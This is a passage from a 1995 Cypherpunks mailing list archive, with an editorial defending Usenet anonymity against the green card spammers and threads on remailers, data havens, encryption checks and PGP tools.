Siegel correctly points out, the Net is not governed by any one individual person or organization. Rather, it is collectively run by those who use it as part of their daily lives. The operation of each Internet node is subject to the individual judgement of the people who own it. Ms. Siegel is wrong, however, in believeing that such a state of affairs is intolerable. Rather, this state of affairs has brough us a remarkable flowering of discourse, ideas and culture, which is just now beginning to be recognized in the mainstream press. In a lawyer's dream world, there is a rule covering every action in every situation, along with a well-functioning system to enforce the rules. This is the exact opposite of the spirit of the Net, and of Usenet in particular. Rather, there has evolved an informal set of guidelines for promoting open, civil discourse, collectively known as "netiquette." These guidelines may seem arcane to newcomers, but basically they simply ask people who use the Net to be considerate of other people, their time and their resources. A violation of netiquette brings on not legal action, but responses pointing out why the action was inconsiderate. Continued violation brings on ridicule and scorn -- people who engage in this are considered to be either sociopathic or just obnoxiously self-promoting. The single most infamous breach of netiquette in Usenet history was almost certainly the "green card spam," in which thousands of advertisements for green card services were posted to completely unrelated message areas, or "newsgroups." Advertisements presented in a way considerate to others are tolerated and even welcomed on the Net. Posting thousands of copies, though, is just going too far. Negative response was immediate. The perpetrators were asked to stop, but they refused to. One Norwegian hacker took it upon himself to track down and "cancel" the offending messages. Most people on the Net considered this to be entirely appropriate. A number of other self-promoting hucksters have sensed an opportunity, and have performed similar spams. In response, the Net evolved a defense mechanism to counter these spams and minimize the damage. The person currently serving this role is known by the pseudonym "CancelMoose." Almost everyone on the Net supports this effort, and agrees that it improves the overall value of Usenet. Who was responsible for the original green card spam? Why, Ms. Siegel herself, the same one who is complaining about "chaos and anarchy." Chaos, anarchy, and anonymity are a large part of what keeps the Net so vital. Particularly galling is Ms. Siegel's appeal to free speech. Usenet in its present form is perhaps the most conducive forum for free speech in history. The threat to free speech is not from chaos or anonymity, but from the sorts of changes that Ms. Siegel proposes. Usenet is astonishingly effective in getting around the practical barriers to free speech. These barriers come in many forms, including libel, trademark, and copyright laws, fear of retribution, etc. Because of its decentralized, communal nature, Usenet resists direct attempts to censor. The main tool for circumventing more these more indirect barriers is anonymity. As an example of such barriers, take the t-shirt commemorating the green card incident. It was emblazoned with the words, "Green Card Lawyers - Spamming the Globe" and a fist clutching a green card. Shortly after the shirt was proposed, Canter & Siegel threatened to sue if the shirt was in fact produced. It was only after several outraged lawyers promised to defend against such a case pro bono that I and others could be proud owners. Or take one of the sexual abuse recovery newsgroups, where anonymity is the norm. If someone were to post a message asking for support, saying "my uncle did it" under their real name, they would be vulnerable to a libel suit from said uncle. On the other hand, if they used an anonymous service such as the one in Finland, they would not simply escape punishment for the libel, but prevent it from happening at all. In many countries (and even China is on the Net these days), writings critical of the government, such as exposure of human rights abuses, are illegal. The authors face imprisonment, torture and death. By posting anonymously to the Net, the information can be brought safely to the attention of the world. Not all anonymous messages are pleasant or popular. Unpopular speech is a necessary consequence of free speech. At least to the founders of this country, the benefits of free speech outweigh the discomfort. Our founding fathers were also comfortable with anonymity -- the Federalist papers were originally published under the pseudonym Publius, because the authors felt the ideas should be evaluated on their own. Judging from the materials already published by Ms. Siegel, an Internet built according to her vision would free of such disturbing ideas, but would readily support five hundred channels of green card ads, impassioned pleas to purchase American flag plaques, and, yes, anonymous testimonials for radial keratotomy specialists. From jya at pipeline.com Sat Jan 14 07:01:43 1995 From: jya at pipeline.com (John Young) Date: Sat, 14 Jan 95 07:01:43 PST Subject: NYT on Phiber Optik Message-ID: <199501141501.KAA13781@pipe1.pipeline.com> There's an article today on Phiber's return to indecency, a recap of MOD and celebratory party, with digs by unnabbed hiway-weebs. For copy send blank message with subject: PHI_out From rishab at dxm.ernet.in Sat Jan 14 08:59:17 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 14 Jan 95 08:59:17 PST Subject: BBC on Net trade, G7 special summit Message-ID: BBC WSTV reports on commerce on the Net prior to a special G7 meet on the implications of the infosphere. Surprisingly, they don't mention anarchic blackmarketeers; more surprisingly they don't mention encryption - which one might expect when they talk about a one-man garage firm settling multimillion $ commodities trade contracts over the Net. Some people are about to learn something really fast. Let's hope they don't react like C&S. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Jan 14 08:59:18 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 14 Jan 95 08:59:18 PST Subject: Gateways to the infosphere Message-ID: Here I argue that universal service is unnecessary even for equal distribution of information age opportunity, if one drops the 'highway' metaphor which, as I argued in the last episode, is lousy. This one also points out the advantage and use of demand-driven markets in widening access - Bombay slum-dwellers without clean water buy colour TVs and VCRs. For info on back issues, send a blank message with 'get help' (without the quotes) as the Subject to rishab at arbornet.org (do NOT 'r'eply to _this_ message). --------cut here-------- Electric Dreams Weekly column for The Asian Age by Rishab Aiyer Ghosh #43, 9/January/1995: Gateways to the infosphere Asimov once wrote of a universe where intelligent life was intelligence alone, roaming the avenues of pure thought divorced from all physical form. To reach the infosphere with your feet still on this planet though, you need a point of access, a gateway to what could easily become another world in your life. The nature of these gateways, their availability and their owners are among the more contentious aspects of the global information infrastructure. The task of developing this infrastructure to the point of ubiquity has been compared to the construction of road networks - any place, however remote, must be connected to every other. As this would make little economic sense for private investors, the task had to be one for the government. Present-day governments are poor, so they insist that subsidies should come from business in the form of universal service: providing the same thing at the same prices everywhere. The rationale for this is noble - equal opportunity to all. Without roads people can't get anywhere, literally and economically, and the same must be true for information highways. But if the info-highway is actually an information ocean, the situation changes dramatically. It is no longer necessary to move from place to place, but simply to dive in. This is true even in practical terms. On a highway, the route traffic takes is important, because of the distance, while on the Internet routing is a very low-level, technical sort of thing, as data may travel in little pieces on different paths, ignoring geographical distance. Moreover, a highway needs a physical connection between any two points, which affects costs, while the infosphere floats above waiting to be reached through a satellite transceiver from just anywhere. Nor will the lack of universal service lead to a society of information haves and have-nots. Information is unique in that one doesn't 'have' it. It is created, and a 'have- not' can easily become a 'have'. The possible inequality is in trading information resources, in knowledge opportunities. However, especially in the field of information, people are not equally equipped to take advantage of opportunities, however unequally distributed the latter may be. Instead of demanding universal service, governments should encourage the development of infrastructure where it will be best used, which is in the interests of business, anyway. Unfortunately even telecom corporations have an incorrect perception of who the best users are. They believe in connecting those who can pay now for services, rather than the many more who would benefit and therefore be able to pay the most, once they exploit currently non-existent opportunities. Demand-driven markets grow fastest, though companies right now seem to be more interested in shoving interactive television down the eyes of the reluctant and rather bored elite. A demand-driven information market is harder to work with, as prospective buyers (as also the sellers) have to be convinced of the benefits of technology. But the potential markets are huge, if far from the minds of the vendors of 'convergence' technology, as peoples' information (or entertainment) needs are often more basic than their material needs - just look at Bombay slum- dwellers, who despite limited access to clean drinking water, buy colour televisions and VCRs. They only needed to see what TV was good for, first. An information ocean is cheaper to build than any highway could possibly be. It needs no legislation to exist everywhere, this is in its very nature. Gateways to the infosphere will, governments permitting, sprout spontaneously wherever needed, as cracks on the surface of a frozen sea. Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in). --====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====-- This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in) --==================================================================-- ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From raph at netcom.com Sat Jan 14 09:32:39 1995 From: raph at netcom.com (Raph Levien) Date: Sat, 14 Jan 95 09:32:39 PST Subject: Final draft of editorial to SF Chronicle Message-ID: <199501141731.JAA23607@netcom11.netcom.com> This is the final cut. Only minor copyedits have been made. Thanks to all who responded -- about a dozen messages all strongly in favor. Anyone know the email address or fax number for the Chicago Tribune? Raph Chaos and Anonymity keep the Internet Vital I could not let Martha Siegel's editorial ("Anarchy, Chaos on the Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed reader, her arguments may seem plausible. However, her distortions give a picture of the Internet quite at odds with the true nature of the Net. Her views are by no means representative of those who actually use the Net. Of the dozens of messages I saw in response to the editorial, not a single one was in favor of her proposals. As Ms. Siegel correctly points out, the Net is not governed by any one individual person or organization. Rather, it is collectively run by those who use it as part of their daily lives. The operation of each Internet node is subject to the individual judgement of the people who own it. Ms. Siegel is wrong, however, in believing that such a state of affairs is intolerable. Rather, this state of affairs has brought us a remarkable flowering of discourse, ideas and culture, which is just now beginning to be recognized in the mainstream press. In a lawyer's dream world, there is a rule covering every action in every situation, along with a well-functioning system to enforce the rules. This is the exact opposite of the spirit of the Net, and in particular of Usenet, the collection of ten thousand newsgroups which carries most public discussion on the Net. Rather, there has evolved an informal set of guidelines for promoting open, civil discourse, collectively known as "netiquette." These guidelines may seem arcane to newcomers, but basically they simply ask people who use the Net to be considerate of other people, their time and their resources. A violation of netiquette brings on not legal action, but responses pointing out why the action was inconsiderate. Continued violation brings on ridicule and scorn -- people who engage in this are considered to be either sociopathic or just obnoxiously self-promoting. The single most infamous breach of netiquette in Usenet history was almost certainly the "green card spam," in which thousands of advertisements for green card services were posted to completely unrelated newsgroups. Advertisements presented in a way considerate to others are tolerated and even welcomed on the Net. Posting thousands of copies, though, is just going too far. Negative response was immediate. The perpetrators were asked to stop, but they refused to. One Norwegian hacker took it upon himself to track down and "cancel" the offending messages. Most people on the Net considered this to be entirely appropriate. A number of other self-promoting hucksters have sensed an opportunity, and have performed similar spams. In response, the Net evolved a defense mechanism to counter these spams and minimize the damage. The person currently serving this role is known by the pseudonym "CancelMoose." Almost everyone on the Net supports this effort, and agrees that it improves the overall value of Usenet. Who was responsible for the original green card spam? Why, Ms. Siegel herself, the same one who is complaining about "chaos and anarchy." Chaos, anarchy, and anonymity are a large part of what keeps the Net so vital. Particularly galling is Ms. Siegel's appeal to free speech. Usenet in its present form is perhaps the most conducive forum for free speech in history. The threat to free speech is not from chaos or anonymity, but from the sorts of changes that Ms. Siegel proposes. Usenet is astonishingly effective in getting around the practical barriers to free speech. These barriers come in many forms, including libel, trademark, and copyright laws, fear of retribution, etc. Because of its decentralized, communal nature, Usenet resists direct attempts to censor. The main tool for circumventing these more indirect barriers is anonymity. As an example of such barriers, take the t-shirt commemorating the green card incident. It was emblazoned with the words, "Green Card Lawyers - Spamming the Globe" and a fist clutching a green card. Shortly after the shirt was proposed, Canter & Siegel threatened to sue if the shirt was in fact produced. It was only after several outraged lawyers promised to defend against such a case pro bono that I and others could be proud owners. Or take one of the sexual abuse recovery newsgroups, where anonymity is the norm. If someone were to post a message asking for support, saying "my uncle did it" under their real name, they would be vulnerable to a libel suit from said uncle. On the other hand, if they used an anonymous service such as the one in Finland, they would not simply escape punishment for the libel, but prevent it from happening at all. In many countries (and even China is on the Net these days), writings critical of the government, such as exposure of human rights abuses, are illegal. The authors face imprisonment, torture and death. By posting anonymously to the Net, the information can be brought safely to the attention of the world. Not all anonymous messages are pleasant or popular. Unpopular speech is a necessary consequence of free speech. At least to the founders of this country, the benefits of free speech outweigh the discomfort. Our founding fathers were also comfortable with anonymity -- the Federalist papers were originally published under the pseudonym Publius, because the authors felt the ideas should stand on their own, without opinion being swayed by the names behind them. Judging from the materials already published by Ms. Siegel, an Internet built according to her vision would be free of such disturbing ideas, but would readily support five hundred channels of green card ads, impassioned pleas to purchase American flag plaques, and, yes, anonymous testimonials for radial keratotomy specialists. ------------------------------ Raph Levien is a graduate student in computer science at the University of California, Berkeley From aj at pcnet.com Sat Jan 14 09:46:07 1995 From: aj at pcnet.com (A.J. Janschewitz) Date: Sat, 14 Jan 95 09:46:07 PST Subject: Media watch Message-ID: NPR's "Weekend Edition/Saturday" has an insubstantial piece on Phyber Optik on today's program, check local NPR times/listings. Nexis-hunters might want to check out a manifestly stupid editorial in today's Hartford (CT) Courant, significant only because it is the (L-A Times-owned) paper of record in the state of greatest wealth in the U-S. I would summarize it, but I don't understand it; something to do with shrink-wrap copyrights and digital cash. Fax copies sent to interested parties, just give me a number. ==a.j.== "The large print giveth and the small print taketh away." - Tom Waits From Ben.Goren at asu.edu Sat Jan 14 09:51:54 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Sat, 14 Jan 95 09:51:54 PST Subject: How do I know if its encrypted? Message-ID: Paul, I think we're after two different objectives here. You want Alice to be sure that Dave can't read her file; I want Dave to be sure that he can't read Alice's files. Alice should worry only about her privacy: if she doesn't want Dave to know what she's sending, she should encrypt her file in a way that Dave cannot break. Dave certainly doesn't want to know what Alice is sending him, because he might have to answer to a Grand Jury if he did. My protocal makes it very difficult for Dave to gain any useful knowledge about Alice's files. Dave does this not as a courtesy to Alice, but for those three wonderful letters, CYA. Of course, any data haven worth paying for will offer lots of neat features, like PGP support, anonymous file drops, and all other sorts of goodies. But that does little good if Alice can trick Dave into selling child pornography. Douglass Floyd asked, "How do I know if [be certain that] it's encrypted?" Unfortunately, I'm pretty sure the answer is, "You decrypt it." My protocol at least delays the decryption until it's [hopefully] too late to matter. b& [Here's part of the thread; nothing new follows.] At 11:00 PM 1/13/95, Paul J. Ste. Marie wrote: >At 10:07 PM 1/13/95, Ben Goren wrote: >> ... Alice hashes her file and uses that hash as the key to encrypt the file. >>She sends the file to Dave, and sends the original hash when she wants it >>back. Dave decrypts, and confirms the hash. >> >>Unfortunately, this still doesn't quite close the loop--Dave knows the >>contents of the file once Alice sends the key. It does, however, make it >>very difficult for Dave to know anything about Alice's file. ... > >This seems overly complicated. If Dave has a known public key, then Alice >should be able to hash her file, sign the hash, encrypt (the hash, her >public key, and the file) with Dave's public key, and (anonymously) sends >the result to Dave's (encrypted) address. Dave then decrypts, verifies the >sig, and stores the file, hash, and PK together, indexed by the hash. > >When Alice wants the file back, she signs (the hash and her encrypted return >address), encrypts the result with Dave's key, and sends it off. Dave >decrypts the request, fetchs the public key based on the decrypted hash, >verifies the signature, encrypts the file with Alice's provided public key, >and sends it back to the encrypted return address. > >To avoid Dave's knowing the file contents, Alice can encrypt it before the >described protocol and decrypt it afterwards. The protocol is subject to a >replay attack, but the result of the replay would cause the file to be sent >to the original sender and not to the replayer. > >The signed hash in the first step prevents people from spamming Dave with >files that have Alice's public key. Alice only requires an encrypted >address and public key for Dave, and Dave validates the retrieval request >against the public sent in the first step. > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From pfarrell at netcom.com Sat Jan 14 10:29:55 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sat, 14 Jan 95 10:29:55 PST Subject: State of PGP dll?; Encrypted session projects Message-ID: <48550.pfarrell@netcom.com> sdw at lig.net (Stephen D. Williams) writes: > What is the state of the Windows/.dll PGP libraries? > Does anyone have a usable version yet? I helped David get a compiled version of a .DLL, but it was way too raw to use. Specifically, all we did was make a DLL of all of the code, exporting all of the subroutines. A usefull .DLL would only publish the "important" ones, and leave the internals hidden. The selection of which routines need to be classified as "important" is a bunch of work. Additionally, I expect that some of the routines would really be better off with a wrapper that made less of their internals visible. All quite doable, but a non-trivial effort. I know I'm too busy to attack it. > For Windows: twnsck12.zip, which is simple, is GNU, and has source and > by writing a relatively simple windows serial terminal emulator and > using Comt ($15 or 25 shareware) to convert it to a telnet client. > Both of these could be modified fairly easily. There are sources to a simple terminal emulator in the MSVC samples directory. Changing it to use sockets wouldn't be all that hard. Last time I looked, comt didn't work under NT, and so I stopped looking at it. There are also terminal emulators in the code in at least two books, Monk's Windows Programmer's Guide to Serial Communications, and Nelson's Serial Communications, a C++ developers's Guide. Since I'd much rather write C++ than C, I prefer Nelson's. I use ewan as a terminal emulator, got it from cica or wustl, I forget which. Dunno if sources are availavle. > Does anyone have better ideas? Any suggestions on login/key > exchange sequence? SKey would work if you are talking to a unix box that you can get the admin to change. Pat Pat Farrell Grad Student pfarrell at cs.gmu.edu Department of Computer Science George Mason University, Fairfax, VA Public key availble via finger #include From lce at wwa.com Sat Jan 14 10:31:21 1995 From: lce at wwa.com (Larry E) Date: Sat, 14 Jan 95 10:31:21 PST Subject: How do I know if its encrypted? In-Reply-To: <9501140112.AB29647@eri.erinet.com> Message-ID: In article <9501140112.AB29647 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote: > At 09:17 PM 1/12/95 -0600, Larry E wrote: > > > (2) legal groups etc. who may try to hold the remailer > > liable in some way for what passes through their remailer. > > It strikes me that this is a very weak defense. Legal beagles will probably > argue that the remailer should have either prohibited encrypted > communications or else was in collusion with the sending party. > Those who believe remailers are an evil will argue against any measure that will promote their presence (and I'm not suggesting you're in that group). I disagree strongly with their stance. I would be happy if there were three of four times as many remailers operating as there are now. The issue of whether encryption is a foolproof defense is not the primary issue. The issue is: what steps can be taken to improve the lifespan of existing remailers and promote the addition of new ones. Resolving the problems that cause remailers to fold will be an evolutionary process, and no step along that path will be perfect or resolve all the problems that plague the remailers. Is encryption a step in the right direction, if an imperfect one? If not I hope some other positive steps are proposed soon, else I fear remailers may face extinction. From jsled at free.org Sat Jan 14 15:18:38 1995 From: jsled at free.org (Josh Michael Sled) Date: Sat, 14 Jan 95 15:18:38 PST Subject: Slogan/procmail help Message-ID: <199501142337.XAA08521@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- Speaking of testing stuff.... After my last question about C'punks slogans, I've messed up some stuff and haven't storage of the list since, therefore I don't have any of the replies. If anyone would like to compile a list of what's been said (if anything) and mail to to me (to jsled at ctp.org), I'd be eternally grateful. Also, if anyone is fluent in procmail (I think there are a couple of you floating around), please mail me at jsled at ctp.org... Thanks a bunch, sorry for the annoyance. Joshua M. Sled -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLxfoaaTT29daLBKRAQGXlQP/dYc4aPR7rNApmqG78jIDhYZJh6bqMg4i AXVAAZ5IzLP4Z/qch7zkiTM05DjbmXOzkcVBmhlGlO+H2VfNug569A/jEKFnDrDs wg0Rv5mPWLo74zUECHxp7faviAVmOxt7Bx3JzQCmHZXBekq+owUetEraq9hKzCzr qQR+KUq3X+k= =4gq8 -----END PGP SIGNATURE----- --- � KWQ/2 1.2g NR � "MTV get off the air!" - DKs From rishab at dxm.ernet.in Sat Jan 14 15:33:37 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 14 Jan 95 15:33:37 PST Subject: Cybersmut Message-ID: John Young quotes NY Post on Kiddie porn: Rule No. 1 is that [kids] must never ever give their real name, address or telephone number to anyone on-line. Hurray! Let's teach the next generation the value of pseudonymity now! BAN TRUE NAMES! Note: I still have mine in my sig though... too late for me. Tim's axed his phone # suddenly! ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Jan 14 15:37:37 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 14 Jan 95 15:37:37 PST Subject: Data Havens, NOT! Message-ID: Hal Finney writes: > The data haven concept as I understood it held data for public access in > some form (for sale or for free) which would be illegal in some > jurisdiction. This might include credit information that was older than > the legal limit, libelous claims, damaging medical records, etc. > Frankly, I suspect that most usages would be directed towards reducing, > rather than increasing, individual privacy. So this is not an area I am > interested in working towards. I believe the Data Haven started out as a Message Haven to get the effect of anon remailers with less traffic analysis hassles, so there would be no pseudonymous login or anything, you'd either download everything, or apply some filter (as with an alt.anon-messages group). However, the current discussion of glorified remote file systems makes no sense to me. If you can keep something encrypted on a remote site as an archive, you can do it at home. A data haven is more likely to get busted than your home PC; serious efforts (RF pickup of keystrokes/display) will be equally effective in either case. Here's a summary of data havens as I see them: Remote file system where people can anon/pseudonymously dump and read files - in the 'pure' variety there'd be no record of who posted/can read a file. Advantages: 1. Could hinder traffic analysis, if they did not have pseudonymous login in any form. 2. Could act as a store of encrypted data for those who can't/don't encrypt on their own systems 3. Could act as a backup OTOH: 1. Would depend on 'correct usage' ie download of enough irrelevant cover data, and would be vulnerable to analysis at the TCP/IP level. Newsgroups remain far better as means to evade traffic analysis 2. Don't keep all your encrypted BlackNet commodities in one basket - it can be busted more easily than your home machine. If you can encrypt there you can encrypt at home; if encryption is illegal at home, you can't legally access the havens. 3. Pfaugh! Rent space on Netcom. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From hfinney at shell.portal.com Sat Jan 14 15:39:11 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 14 Jan 95 15:39:11 PST Subject: How do I know if its encrypted? Message-ID: <199501142339.PAA08580@jobe.shell.portal.com> If you want to not be able to read the files on your storage site, then why not just try reading them? Check their entropy to make sure it is maximal, check that they can't be unzipped, unstuffed, displayed as gif or jpeg files. When a new format becomes popular add that to the list. This is all you can do. What does this gain you? I'm not sure. If someone posts encrypted Windows 95, then publicizes the location and the key, people will get the data just as easily as if it were not encrypted. Hal From 73211.3713 at compuserve.com Sat Jan 14 15:46:40 1995 From: 73211.3713 at compuserve.com (Loren Fleckenstein) Date: Sat, 14 Jan 95 15:46:40 PST Subject: voice pgp Message-ID: <950114234444_73211.3713_DHI35-1@CompuServe.COM> I've heard mention that Phil Zimmermann was going to demonstrate Voice PGP at the January Cypherpunks meeting at Cygnus. Can anyone mail me a note about this? Has the meeting already taken place? How well did the demo perform? From Ben.Goren at asu.edu Sat Jan 14 16:24:34 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Sat, 14 Jan 95 16:24:34 PST Subject: Self-service computers Message-ID: A friend of mine forwarded this to me; I couldn't resist forwarding it to the list. b& ---- Date: 4 JAN 1995 16:32:23 -0500 From: Kay Lukens Newgroups: alt.humor.best-of-usenet Subject: [pdx.general] Re: Keep self-service COMPUTERS out of Oregon! From: keithl at chip.klic.rain.com (Keith Lofstrom) Newsgroups: pdx.general,or.politics Subject: Re: Keep self-service COMPUTERS out of Oregon! It has been pointed out by the stalwart defenders of our rights (to be told what to do) that self-service for gasoline is a Bad Thing. We are assured by many of the same people that self-service for pharmaceuticals, personal defense, transportation, and education are also Bad Things. Other folks, nominally their political competitors (in the same sense that Burgerville and Burger King are competitors) assure us that self-service in personal morality is an *extremely* Bad Thing. And look at what happened to Joycelin Elders when she suggested self-service for sex... >From this, we must conclude that self-service is in itself highly suspicious. Look at self-service grocery stores - all the time people are buying things that are bad for them. Self-service entertainment has resulted in Beavis and Butthead. And look at the way many computer professionals dress - if this is not an indictment of self-service apparel, what is? However, in the finest tradition of bureaucratic micromanagement, we as computer professionals are not qualified to even consider these effects on other aspects of Society. Such thoughts must be reserved for Wiser Heads Than Ours (unless of course the subject is economics or nuclear power, in which case Our Opinions Count). No, we as computer professionals must confine our thoughts to self-service as it affects us - through our flagrant, dangerous, and socially irresponsible use of Self-Service Computers! Self-Service Computers: Threat or Menace? Carpal Tunnel Syndrome. Backaches. Obesity. Bleeding Piles. Bill Gates and Steve Jobs. Computers are a known health threat. Reputed Scientific Journals, such as the National Enquirer, are full of stories of people being turned into three-headed cabbages by Nucular Radiation from video displays. It is obvious that the average computer professional, while quite able to find obscure flaws in Pentiums or the secret levels in Doom, is a helpless incompetent when it comes to actually typing on or reading from personal computers. We get so caught up in our alleged thinking that we don't notice our bodies turning into rickety tubs of cancerous lard. We Need Help! Meanwhile, the Great Unwashed Masses are being deprived access to the Information Super Duper Highway. Confined to low paying jobs as sanitation workers or Congressional Representatives, these poor wretches are unable to share in this cornucopia of undocumented, virus-ridden software, poorly informed opinion, and stolen pornography that we call the Internet. These outcasts of the information age must fritter away their time which such mind-numbing activities as outdoor sports, rampant sex, and junkets to the Caribbean. When these people accidentally find their way onto the Internet, perhaps by mistakenly sending their rent check to America On Line, they begin posting meaningless, inappropriate drivel such as spam advertisements for shady lawyers, or actual referenced facts from original sources, violating the hallowed traditions of the Internet. While all citizens must have access to the Net, LET'S NOT GET CARRIED AWAY HERE. What Should We Do? (That is, how can we find new excuses to control other people with minority opinions?) The only solution is to ELIMINATE self-service computers! Every computer in the State of Oregon *must* be operated by THREE OR MORE people - one to do the thinking, one to do the typing, and one to read the screen - preferably through a foot of leaded glass! Think of all the jobs this would create! Not only would we have jobs for all the new operators themselves, we could create vast new bureaucracies to insure that the operators are specially trained, certified, and licensed! Computer Cops could roam the streets, equipped with special Jolt-sniffing dogs, breaking down the doors of self-service scofflaws! Pizza delivery drivers would find new income and respect by turning in their hacker clients! Elizabeth Furse, famous for not reading her own email and for having flunkies type in press releases, will become our shining symbol of the new, socially responsible computer age! You can help. Send your checks to C.A.S.H., the Committee to Abolish Selfservice Hardware, care of me (thnx Frank). I will see that your donation gets the attention it deserves. And on behalf of all of us here at C.A.S.H. (Arnold who handles the left side of the keyboard, Julia the right side, Millie the punctuation, Sam who reads the verbs, Trevor who reads the nouns, and our shop steward Penny, who is lobbying for a government grant to bring in a mentally-challenged lesbian vegetarian special needs hispanic-surnamed person of color to watch the blinky lights on the modem) may you have an appropriate and socially enlightening seasonal celebration! -- Moderators accept or reject articles based solely on the criteria posted in the Frequently Asked Questions. Article content is the responsibility of the submittor. Submit articles to ahbou-sub at acpub.duke.edu. To write to the moderators, send mail to ahbou-mod at acpub.duke.edu. -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From jsled at free.org Sat Jan 14 16:26:24 1995 From: jsled at free.org (Josh Michael Sled) Date: Sat, 14 Jan 95 16:26:24 PST Subject: C`punks slogan? - Pri Message-ID: <199501150045.AAA09400@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- lmccarth at thor.cs.umass.ed wrote: > Lest we suffer a recurrence of the C'punks Logo thread, which generated a > whole raft of list traffic which would have been better kept private, please > reply directly to Joshua and not to the whole list. [He seems to imply that > he wants private replies ("testing procmail") anyway, but I want to encourage > this practice explicitly.] Thanks... actually, that's exactly what I wanted, but forgot to put it in... and my last post about "Slogan help": disregard that entirely... it's not needed (either part). But so far I've only gotten one reply about the slogan thing, so please give me help on that one, folks... Josh Sled -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51 UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/ GMDvXoaKPa0= =i71M -----END PGP SIGNATURE----- --- � KWQ/2 1.2g NR � "MTV get off the air!" - DKs From carolb at barton.spring.com Sat Jan 14 16:28:35 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Sat, 14 Jan 95 16:28:35 PST Subject: Draft of editorial to SF Chronicle In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com> Message-ID: editorial.rad.nice even I'm still here..to show it works. censored.org registration is finally in. Thankx I can even use Lance's remailer correctly now. and so I dont waste "bandwidth" this is end of screen. rad.editorial! RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From rrothenb at libws4.ic.sunysb.edu Sat Jan 14 20:45:53 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Sat, 14 Jan 95 20:45:53 PST Subject: Another problem w/Data Havens... Message-ID: <9501150445.AA13977@toad.com> I can see a potential problem with Data Havens (as they've been discussed here) that may very well inspire the wrath of the authorities more than nuclear secrets or dirty pictures of J.Edgar Hoover... How does one keep a site from becomming a remote pirated-software exchange site? (Esp. since after that MIT case laws may be changed...) It seems that such a service could become a magnet for the "elite warez" crowd... and even if the operator isn't jailed it could lead to a shutdown of the service. From pstemari at erinet.com Sat Jan 14 22:02:40 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 14 Jan 95 22:02:40 PST Subject: How do I know if its encrypted? Message-ID: <9501150554.AA29412@eri.erinet.com> At 11:53 AM 1/14/95 -0600, Larry E wrote: > ... Those who believe remailers are an evil will argue against any >measure that will promote their presence (and I'm not suggesting >you're in that group). ... True enough. > ... Is encryption a step in the right direction, if an imperfect one? If >not I hope some other positive steps are proposed soon, else I fear >remailers may face extinction. The big problem I have with mandatory encryption for remailers is that it thwarts one of the two major purposes of remailers. Basically I see remailers serving two goals: 1) Defeating traffic analysis of point-to-point communications. Mandating encryption for this is redundant--anyone who wanted this would be encrypting their mail to begin with. Also, I don't believe this mode of operation generates many complaints. 2) Anonymous broadcast transmission. This one can generate a lot of complaints, but it is also very important for things like *.recovery newsgroups. Mandating encryption renders this mode useless. There is a third use, which is anonymous point-to-point transmission. While this is of some benefit for anonymous tip line, it makes things like mailbombs and hate mail very easy. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Sat Jan 14 22:02:48 1995 From: pstemari at 